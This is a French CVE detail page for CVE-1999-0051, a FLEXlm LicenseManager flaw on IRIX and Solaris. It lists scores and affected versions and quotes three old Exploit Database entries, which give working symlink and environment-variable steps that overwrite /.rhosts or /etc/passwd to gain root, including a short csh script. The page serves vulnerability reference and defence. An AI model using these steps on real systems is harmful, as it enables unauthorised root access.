CVE-1999-0051 : Détail

CVE-1999-0051

0.04%V3
Local
1999-09-29
02h00 +00:00
2024-08-01
16h27 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Arbitrary file creation and program execution using FLEXlm LicenseManager, from versions 4.0 to 5.0, in IRIX.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 19066

Date de publication : 1996-04-04 22h00 +00:00
Auteur : Arthur Hagen
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/72/info Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to overwrite root-owned files allowing root access. % setenv NETLS_LICENSE_FILE /.rhosts % /usr/etc/LicenseManager & Install... NetLS Node-locked Vendor Name: whatever Vendor ID: + + Product name: whatever License version: 1.000 License version: Expiration date: 01-jan-0 (in license version field put a space) Apply License(s) succesfully installed % cat /.rhosts #:# "whatever" "whatever" "1.000" "Incomplete" + + If your system has remote root logins disabled, replacing /.rhosts with /etc/passwd and + + with toor:0:0::/:/bin/sh.
Exploit Database EDB-ID : 19067

Date de publication : 1996-11-21 23h00 +00:00
Auteur : Yuri Volobuev
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/73/info Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to arbitrary manipulate root-owned files allowing root access. % mkdir -p /tmp/var/flexlm % setenv LICENSEMGR_FILE_ROOT /tmp % cd /tmp/var/flexlm % cat > license.dat # # FLEXlm license file # FEATURE + + blah sgifd 1.00 01-jan-0 0 blah ^D % ln -s /.rhosts license.dat.log % LicenseManager & Next click on Update, fill in the four fields with any information and click on Apply. LicenseManager will report an error. Ignore it and exit. % cat /.rhosts Checkpoint file /var/flexlm/license.dat Fri Nov 22 19:05:50 1996 # # FLEXlm license file # FEATURE + + blah sgifd 1.00 01-jan-0 0 blah % rsh localhost -l root #
Exploit Database EDB-ID : 19350

Date de publication : 1998-10-20 22h00 +00:00
Auteur : Joel Eriksson
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/461/info The Solaris License Manager that ships with versions 2.5.1 and 2.6 is vulnerable to multiple symlink attacks. License Manager creates lockfiles owned by root and set mode 666 which it writes to regularily. It follows symlinks. bash$ ls -l /var/tmp/lock* -rw-rw-rw- 1 root root 0 Oct 21 18:24 /var/tmp/lockESRI -rw-rw-rw- 1 root root 0 Oct 21 16:40 /var/tmp/lockISE-TCADd -rw-rw-rw- 1 root root 0 Oct 21 14:29 /var/tmp/lockalta -rw-rw-rw- 1 root root 0 Oct 21 18:52 /var/tmp/lockansysd -rw-rw-rw- 1 root root 0 Oct 21 18:52 /var/tmp/lockasterxd -rw-rw-rw- 1 root root 0 Oct 21 16:40 /var/tmp/lockhpeesofd -rw-rw-rw- 1 root root 0 Oct 21 18:46 /var/tmp/locksuntechd And: bash$ ls -l /var/tmp/.flexlm total 2 -rw-rw-rw- 1 root root 163 Oct 21 19:55 lmgrd.211 There are several lockfiles created by the License Manager. It is trivial to gain root access locally through exploitation of this vulnerability. ------ #!/bin/csh -f # Change target user name before running # [email protected] 10/98 rm /tmp/locksuntechd ln -s ~targetuser/.rhosts /tmp/locksuntechd exit ------ then wait a min and cat + + >> ~targetuser/.rhosts

Products Mentioned

Configuraton 0

Globetrotter>>Flexlm >> Version 4.0

    Globetrotter>>Flexlm >> Version 4.1

      Globetrotter>>Flexlm >> Version 5.0

        Sgi>>License_oeo >> Version 3.0

          Sgi>>License_oeo >> Version 3.1

            Sgi>>License_oeo >> Version 3.1.1

              Sgi>>Irix >> Version 3.3.2

                Sgi>>Irix >> Version 3.3.3

                  Sgi>>Irix >> Version 4.0

                    Sgi>>Irix >> Version 4.0.1

                    Sgi>>Irix >> Version 4.0.1t

                    Sgi>>Irix >> Version 4.0.2

                    Sgi>>Irix >> Version 4.0.3

                    Sgi>>Irix >> Version 4.0.4

                    Sgi>>Irix >> Version 4.0.4b

                    Sgi>>Irix >> Version 4.0.4t

                    Sgi>>Irix >> Version 4.0.5

                    Sgi>>Irix >> Version 4.0.5_iop

                    Sgi>>Irix >> Version 4.0.5_ipr

                      Sgi>>Irix >> Version 4.0.5a

                      Sgi>>Irix >> Version 4.0.5d

                      Sgi>>Irix >> Version 4.0.5e

                      Sgi>>Irix >> Version 4.0.5f

                      Sgi>>Irix >> Version 4.0.5g

                      Sgi>>Irix >> Version 4.0.5h

                      Sgi>>Irix >> Version 5.0

                        Sgi>>Irix >> Version 5.0.1

                        Sgi>>Irix >> Version 5.1

                        Sgi>>Irix >> Version 5.1.1

                        Sgi>>Irix >> Version 5.2

                        Sgi>>Irix >> Version 5.3

                        Sgi>>Irix >> Version 6.0

                        Sgi>>Irix >> Version 6.0.1

                        Sgi>>Irix >> Version 6.0.1

                        Sgi>>Irix >> Version 6.1

                        Sgi>>Irix >> Version 6.2

                        Sgi>>Irix >> Version 6.3

                        Sgi>>Irix >> Version 6.4

                        Configuraton 0

                        Sun>>Solaris >> Version 2.4

                          Sun>>Solaris >> Version 2.5

                            Sun>>Solaris >> Version 2.5.1

                              Sun>>Sunos >> Version 4.1.1

                              Sun>>Sunos >> Version 4.1.2

                              Sun>>Sunos >> Version 4.1.3

                              Sun>>Sunos >> Version 4.1.3u1

                              Sun>>Sunos >> Version 4.1.4

                              Sun>>Sunos >> Version 4.1.4jl

                                Sun>>Sunos >> Version 5.4

                                Sun>>Sunos >> Version 5.5

                                Sun>>Sunos >> Version 5.5.1

                                Références